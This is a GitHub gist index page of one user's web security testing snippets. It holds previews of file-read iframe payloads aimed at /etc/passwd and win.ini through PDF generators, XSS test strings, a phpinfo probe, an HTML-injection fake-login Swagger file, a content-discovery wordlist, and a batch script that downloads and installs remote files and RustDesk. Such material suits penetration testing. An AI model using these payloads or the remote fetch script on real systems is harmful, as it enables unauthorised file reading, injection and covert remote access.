A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
ayadim ayadim
ayadim
/ js-vulnerable-code.html
Last active
May 9, 2026 17:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
| <title>Vulnerable JS Demo - Security Research Only</title> | |
| <style> | |
| body { font-family: monospace; padding: 20px; background: #1a1a2e; color: #eee; } | |
| .vuln { border: 1px solid #e94560; padding: 15px; margin: 10px 0; background: #16213e; border-radius: 5px; } | |
| .vuln h3 { color: #e94560; margin-top: 0; } |
ayadim
/ html-read-files.txt
Created
May 9, 2026 17:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>read files using pdf generator</title> | |
| </head> | |
| <body> | |
| <p>There are some cases where server converts uploaded file to a pdf | |
| Try injecting <iframe>, <img>, <base> or <script> elements or CSS url() functions pointing to internal services.</p> | |
| <iframe src=”file:///etc/passwd” width=”400" height=”400"> | |
| <iframe src=”file:///c:/windows/win.ini” width=”400" height=”400"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert(1); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php phpinfo(); ?> |
ayadim
/ js-alert.json
Created
November 29, 2025 21:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {"code": "alert(1)"} |
ayadim
/ swagger-test1.json
Last active
April 4, 2025 08:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "url": "https://gist.githubusercontent.com/ayadim/901ddaa01679a29760f33277b3182782/raw/3b93144e5852088f909eae1b1b7d5a2839a5cf4b/swagger-test1.yaml", | |
| "urls": [ | |
| { | |
| "url": "https://gist.githubusercontent.com/ayadim/901ddaa01679a29760f33277b3182782/raw/3b93144e5852088f909eae1b1b7d5a2839a5cf4b/swagger-test1.yaml", | |
| "name": "Test" | |
| } | |
| ] | |
| } |
ayadim
/ swagger-test1.yaml
Last active
April 4, 2025 08:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| version: 1.0.0 | |
| title: Fake Login Page | |
| description: '<div class="login-form"> | |
| <div class="heading"> | |
| <h1>HTML Injection : Fake Login</h1> | |
| <img src=x onerror="print()"> | |
| </div> | |
| <div class="form-container"> |
ayadim
/ Testing_Checklist.md
Created
September 6, 2024 18:25
— forked from jhaddix/Testing_Checklist.md
Fast Simple Appsec Testing Checklist
ayadim
/ content_discovery_all.txt
Created
September 6, 2024 18:24
— forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ |
ayadim
/ install_vps.txt
Created
September 4, 2024 16:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| curl -L -o login.py https://www.dropbox.com/scl/fi/az5jzhpuiylnw7yqw9du5/login.py?rlkey=1qjxif8fu35dh0v77nagv2ihh&dl=0 | |
| curl -L -o loop.bat https://www.dropbox.com/scl/fi/vji7ekyslpbovokpqeay3/loop.bat?rlkey=876nfzm3qdmyqhc1jckgqjcld&dl=0 | |
| curl -L -o show.bat https://www.dropbox.com/scl/fi/cwbwdo2n3tt8rbqmugc6h/show.bat?rlkey=41m0ds12mg6e28giib3zqlf6w&dl=0 | |
| certutil -urlcache -split -f "https://github.com/rustdesk/rustdesk/releases/download/1.2.1/rustdesk-1.2.1-x86_64.exe" rustdesk.exe | |
| pip install pyautogui --quiet | |
| pip install psutil --quiet | |
| curl -s -L -o time.py https://www.dropbox.com/scl/fi/ox42qglbf6fsnm9erf8cw/timelimit.py?rlkey=opyeqgum1k95kud81xlc7d66r&dl=0 | |
| curl -s -L -o C:\Users\Public\Desktop\Telegram.exe https://telegram.org/dl/desktop/win64 | |
| curl -s -L -o C:\Users\Public\Desktop\Winrar.exe https://www.rarlab.com/rar/winrar-x64-621.exe |
NewerOlder